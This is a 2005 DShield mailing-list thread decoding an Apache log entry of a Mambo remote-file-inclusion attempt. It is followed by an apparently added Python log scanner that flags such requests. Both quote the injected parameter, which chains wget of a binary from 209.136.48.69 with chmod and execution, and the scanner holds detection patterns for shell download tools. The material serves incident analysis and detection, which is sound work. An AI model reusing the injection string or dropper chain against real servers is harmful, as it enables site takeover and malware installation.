[Dshield] Can Someone Decipher This Log Entry?

Meidinger Chris chris.meidinger at badenIT.de
Thu Dec 22 09:51:11 GMT 2005

Hi David,

Google tells me that com_content is part of Mambo, which is an open source mini-CMS.

So it looks like a hole in index2.php

which can be used to execute code from a URL

What is at that URL?
(cmeid at phantom)(285/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- wget &> /dev/null
(cmeid at phantom)(286/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- file cmd.gif
cmd.gif: exported SGML document text
(cmeid at phantom)(287/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- head cmd.gif
Defacing Tool 2.0 by r3v3ng4ns
revengans at gmail.com
se for modificar o codigo, por favor, mantenha o nome de seus autores originais
e por favor, entre em contato comigo...

ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script,
n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!!
(cmeid at phantom)(288/pts/9)(10:46am:12/22/05)-

So it's a defacing tool, which accepts command parameters:

&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"

which tell it what to deface and how.

Fun stuff, huh?

-----Original Message-----
From: list-bounces at lists.dshield.org on behalf of David Cary Hart
Sent: Wed 21-Dec-05 22:53
To: DShield General Discussion List
Subject: [Dshield] Can Someone Decipher This Log Entry?
I have about 25 of these today. I've added index2.php to the firewall watcher.
I cannot make sense of this Apache print: - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"

           Eliminate Spam: http://www.TQMcube.com/spam_trap.php
          Multi-RBL Check: http://www.TQMcube.com/rblcheck.php
            Zombie Graphs: http://www.TQMcube.com/zombies.php
              GeoGraphics: http://www.TQMcube.com/origins.php
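The thread works out by hand what the log entry means: a URL smuggled into Mambo's mosConfig_absolute_path parameter pulls in cmd.gif, and a cmd parameter chained with ; and | tells that script to wget a second-stage binary from 209.136.48.69 and run it. Below is an added example of how a defender would flag such lines automatically; it is not code from the thread, from Mambo, or from DShield. It parses Apache access-log lines, URL-decodes every query parameter, and reports three things: configuration or superglobal names that a client should never be able to set, a remote URL sitting in a parameter value, and a shell command chain with the host it downloads from. The sample lines are constructed: the first reproduces the thread's entry (the archive stripped both the client address and the include URL, which is why it begins with "- -"), the second is the same request with the stripped URL replaced by the placeholder host example.invalid, and the third is a benign com_content request; 203.0.113.x addresses are documentation-range placeholders.

```python
#!/usr/bin/env python3
"""Flag Apache access-log lines that look like the Mambo com_content /
mosConfig_absolute_path remote-file-inclusion attempt from the thread.

Added example, not part of the original post. Hostnames example.invalid and
203.0.113.x are placeholders; 209.136.48.69 and cmd.gif are from the thread.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (see the lead-in for what each one represents).
SAMPLE_LOG = [
    # Thread entry as archived: client IP and include URL were stripped.
    r'- - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"',
    # Same request with a placeholder include URL and a placeholder client.
    r'203.0.113.5 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://example.invalid/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP/1.1" 200 21 "-"',
    # Benign Mambo request for comparison.
    r'203.0.113.7 - - [21/Dec/2005:16:50:02 -0500] "GET /index.php?option=com_content&task=view&id=12&Itemid=2 HTTP/1.1" 200 8451 "-"',
]

# Common/combined log format. The leading token group is tolerant of the
# archive's stripped form ("- -") as well as the normal "client ident user".
LOG_RE = re.compile(
    r'^(?P<prefix>(?:\S+ ){1,3})\[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+)\s+(?P<target>\S+)\s*(?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names a browser should never be sending: these only work because
# register_globals lets a request overwrite the application's own variables.
CONFIG_PARAMS = ("mosconfig_", "globals", "_request[", "_server[")

# A command following ; | or ` inside a parameter value marks a dropper, not a CMS request.
SHELL_CHAIN = re.compile(r'[;|`]\s*(wget|curl|chmod|sh|bash|perl|echo|cd)\b')

# Host (and path) handed to wget/curl, so the second stage can be blocked/hunted.
FETCH_TARGET = re.compile(
    r'\b(?:wget|curl)\s+(?:-\S+\s+)*(?:https?://)?([\w.\-]+(?::\d+)?(?:/[^\s;|&]*)?)'
)


def parse_query(target):
    """Split the request target into (path, [(name, decoded_value), ...]).

    Only the first '?' starts the query; later ones stay inside values, which
    is exactly how the thread's 'id=1index2.php?_REQUEST[...]' value arrives.
    """
    path, _, query = target.partition("?")
    params = []
    for piece in query.split("&"):
        if not piece:
            continue
        name, _, value = piece.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return path, params


def analyze_line(line):
    """Return a dict describing one log line and why (if at all) it is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return {"parse_error": True, "line": line, "suspicious": False, "findings": []}
    path, params = parse_query(m.group("target"))
    findings, fetches = [], []
    for name, value in params:
        if name.lower().startswith(CONFIG_PARAMS):
            findings.append(f"client-supplied config/global override: {name}")
        if re.match(r'(?i)(https?|ftp)://', value):
            findings.append(f"remote URL in parameter {name}: {value.split(';')[0]}")
        if SHELL_CHAIN.search(value):
            findings.append(f"shell command chain in parameter {name}")
            fetches.extend(FETCH_TARGET.findall(value))
    return {
        "client": m.group("prefix").split()[0],
        "time": m.group("time"),
        "path": path,
        "status": int(m.group("status")),
        "findings": findings,
        "download_hosts": sorted({f.split("/")[0] for f in fetches}),
        "suspicious": bool(findings),
    }


def scan(lines):
    """Analyze every line and return only the suspicious ones."""
    return [r for r in (analyze_line(l) for l in lines) if r["suspicious"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["client"]} {hit["path"]} status={hit["status"]}')
        for f in hit["findings"]:
            print("   ", f)
        if hit["download_hosts"]:
            print("    second-stage host(s):", ", ".join(hit["download_hosts"]))
```

Note that the entry was logged with status 200 and a 21-byte body, so a status-based alert would never fire; the decoded parameter names and values are what give the request away. The download host extracted from the wget chain is the value worth adding to an egress block list, since the server itself, not the client, is the one that would connect to it.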